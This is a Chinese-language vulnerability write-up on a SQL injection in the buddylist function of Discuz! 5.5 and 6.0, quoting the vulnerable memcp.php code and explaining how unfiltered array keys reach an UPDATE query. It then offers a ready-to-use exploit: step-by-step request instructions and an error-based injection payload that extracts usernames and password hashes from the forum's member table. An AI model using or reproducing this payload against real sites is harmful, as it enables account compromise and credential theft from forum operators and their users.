Discuz! 5.5 / Discuz! 6.0 SQL注入漏洞

漏洞文件:memcp.php

elseif($action == 'buddylist') {

        if(!submitcheck('buddysubmit', 1)) {

                $query = $db->query("SELECT b.*, m.username FROM {$tablepre}buddys b, {$tablepre}members m
                        WHERE b.uid='$discuz_uid' AND m.uid=b.buddyid ORDER BY dateline DESC");
                while($buddy = $db->fetch_array($query)) {
                        $buddy['dateline'] = gmdate("$dateformat $timeformat", $buddy['dateline'] + $timeoffset * 3600);
                        $buddylist[] = $buddy;
                }

                include template('memcp_misc');

        } else {

                $buddyarray = array();
                $query = $db->query("SELECT * FROM {$tablepre}buddys WHERE uid='$discuz_uid'");
                while($buddy = $db->fetch_array($query)) {
                        $buddyarray[$buddy['buddyid']] = $buddy;
                }
                
                if(!empty($delete) && is_array($delete)) {
                        $db->query("DELETE FROM {$tablepre}buddys WHERE uid='$discuz_uid' AND buddyid IN ('".implode('\',\'', $delete)."')");
                }
              
                if(is_array($descriptionnew)) { //问题出在这里 $descriptionnew未被初始化 discuz会初始时注册变量, 当我们提交 http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[123']=1 的时候 注册了$descriptionnew 变量
/*
include/common.inc.php
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
        foreach($$_request as $_key => $_value) {
                $_key{0} != '_' && $$_key = daddslashes($_value); 
        }
}
*/
                        foreach($descriptionnew as $buddyid => $desc) { //此时的 $buddyid 就是123' 程序初始化的代码不会过滤这里 但是会受gpc的影响
                                if(($desc = cutstr(dhtmlspecialchars($desc), 255)) != addslashes($buddyarray[$buddyid]['description'])) {
                                    
                                        $db->query("UPDATE {$tablepre}buddys SET description='$desc' WHERE uid='$discuz_uid' AND buddyid='$buddyid'"); //$buddyid  被带入到update 语句中了
                                                //相当于 UPDATE {$tablepre}buddys SET description='$desc' WHERE uid='$discuz_uid' AND buddyid='123''
                                }
                        }
                }

                if(($newbuddy && $newbuddy != $discuz_userss) || ($newbuddyid && $newbuddyid != $discuz_uid)) {
                        if(!in_array($adminid, array(1, 2, 3))) {
                                $query = $db->query("SELECT COUNT(*) FROM {$tablepre}buddys WHERE uid='$discuz_uid'");
                                if(($db->result($query, 0)) > 20) {
                                        showmessage('buddy_add_toomany');
                                }
                        }

                        $query = $db->query("SELECT uid FROM {$tablepre}members WHERE ".(empty($newbuddyid) ? "username='$newbuddy'" : "uid='$newbuddyid'"));
                        if($buddyid = $db->result($query, 0)) {
                                if(isset($buddyarray[$buddyid])) {
                                        showmessage('buddy_add_invalid');
                                }
                                $db->query("INSERT INTO {$tablepre}buddys (uid, buddyid, dateline, description)
                                        VALUES ('$discuz_uid', '$buddyid', '$timestamp', '".cutstr(dhtmlspecialchars($newdescription), 255)."')");
                        } else {
                                showmessage('buddy_add_nonexistence');
                        }
                }

                showmessage('buddy_update_succeed', 'memcp.php?action=buddylist');

        }

分析本身没有什么技术含量，所以还是直接给出利用方法，方便大家以后遇到时可以直接使用，而不必像我一样把代码下载回来分析。
1. 先注册一个账号，然后登录该账号
2.

http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[']=1
post
formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4

formhash 的值请查看页面 HTML 源代码后直接替换。

exp:

http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[' and(select 1 from(select count(*),concat((select(select concat(0x7c,username,0x7c,password,0x7c) from cdb_members limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23]=1
post
formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4

看了一下，Discuz! 6 也存在同样的问题，不过代码移到了这个地方：
http://L/my.php?item=buddylist
